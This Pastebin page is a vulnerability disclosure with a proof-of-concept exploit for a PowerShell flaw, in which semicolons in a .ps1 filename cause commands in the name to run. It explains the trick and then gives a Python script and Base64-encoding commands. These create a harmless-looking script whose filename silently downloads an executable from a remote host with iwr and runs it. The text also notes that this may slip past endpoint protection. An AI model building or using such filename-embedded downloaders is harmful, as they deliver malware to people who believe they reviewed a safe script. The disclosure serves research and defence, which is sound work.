Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- [+] Credits: John Page (aka hyp3rlinx)
- [+] Website: hyp3rlinx.altervista.org
- PowerShell can potentially execute arbitrary code when running specially named scripts due to trusting unsanitized filenames.
- This occurs when ".ps1" files contain semicolons ";" or spaces as part of the filename, causing the execution of a different trojan file;
- or the running of unexpected commands straight from the filename itself without the need for a second file.
- For trojan files it doesn't need to be another PowerShell script and can be one of the following ".com, .exe, .bat, .cpl, .js, .vbs and .wsf.
- Therefore, the vulnerably named file ".\Hello;World.ps1" will instead execute "hello.exe", if that script is invoked using the standard
- Windows shell "cmd.exe" and "hello.exe" resides in the same directory as the vulnerably named script.
- However, when such scripts are run from PowerShells shell and not "cmd.exe" the "&" (call operator) will block our exploit from working.
- Still, if the has user enabled ".ps1" scripts to open with PowerShell as its default program, all it takes is double click the file to trigger
- the exploit and the "& call operator" will no longer save you. Also, if the user has not enabled PowerShell to open .ps1 scripts
- as default; then running the script from cmd.exe like: c:\>powershell "\Hello;World.ps1" will also work without dropping into the PowerShell shell.
- My PoC will download a remote executable save it to the victims machine and then execute it, and the PS files contents are irrelevant.
- Also, note I use "%CD" to target the current working directory where the vicitm has initially opened it, after it calls "iwr" (invoke-webrequest)
- abbreviated for space then it sleeps for 2 seconds and finally executes.
- C:\>powershell [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("'powershell iwr 192.168.1.10/n -O %CD%\n.exe ;sleep -s 2;start n.exe'"))
- This can undermine the integrity of PowerShell as it potentially allows unexpected code execution; even when the scripts contents are visually reviewed.
- We may also be able to bypass some endpoint protection or IDS systems that may look at the contents or header of a file but not its filename where are
- commands can be stored.
- For this to work the user must have enabled PowerShell as its default program when opening ".ps1" files.
- First, we create a Base64 encoded filename for obfuscation; that will download and execute a remote executable named in this case "n.exe".
- c:\>powershell [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("'powershell iwr 192.168.1.10/n -O %CD%\n.exe ;sleep -s 2;start n.exe'"))
- Give the PS script a normal begining name, then separate commands using ";" semicolon e.g.
- Test;powershell -e <BASE64 ENCODED COMMANDS>;2.ps1
- Create the executable without a file extension to save space for the filename then save it back using the -O parameter.
- The "-e" is abbreviated for EncodedCommand to again save filename space.
- Host the executable on web-server or just use python -m SimpleHTTPServer 80 or whatever.
- Double click to open in PowerShell watch the file get downloaded saved and executed!
- My example is used as a "filename embedded downloader", but obviously we can just call other secondary trojan files of various types in the same directory.
- Note: User interaction is required, and obviously running any random PS script is dangerous... but hey we looked at the file content and it simply printed a string!
- [Exploit / PoC]
- from base64 import b64encode
- import argparse,sys
- #Windows PowerShell - Unsantized Filename Command Execution Vulnerability PoC
- #Create ".ps1" files with Embedded commands to download, save and execute malware within a PowerShell Script Filename.
- #Expects hostname/ip-addr of web-server housing the exploit.
- #By hyp3rlinx
- #Apparition Security
- #====================
- def parse_args():
- parser.add_argument("-i", "--ipaddress", help="Remote server to download and exec malware from.")
- parser.add_argument("-m", "--local_malware_name", help="Name for the Malware after downloading.")
- parser.add_argument("-r", "--remote_malware_name", help="Malwares name on remote server.")
- return parser.parse_args()
- def main(args):
- PSEmbedFilenameMalwr=""
- if args.ipaddress:
- PSEmbedFilenameMalwr = "powershell iwr "+args.ipaddress+"/"+args.remote_malware_name+" -O %CD%\\"+args.local_malware_name+" ;sleep -s 2;start "+args.local_malware_name
- return b64encode(PSEmbedFilenameMalwr.encode('UTF-16LE'))
- def create_file(payload):
- f=open("Test;PowerShell -e "+payload+";2.ps1", "w")
- f.write("Write-Output 'Have a nice day!'")
- f.close()
- if __name__=="__main__":
- parser = argparse.ArgumentParser()
- PSCmds = main(parse_args())
- if len(sys.argv)==1:
- parser.print_help(sys.stderr)
- sys.exit(1)
- create_file(PSCmds)
- print "PowerShell - Unsantized Filename Command Execution File created!"
- print "By hyp3rlinx"
- [POC Video URL]
- https://www.youtube.com/watch?v=AH33RW9g8J4
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement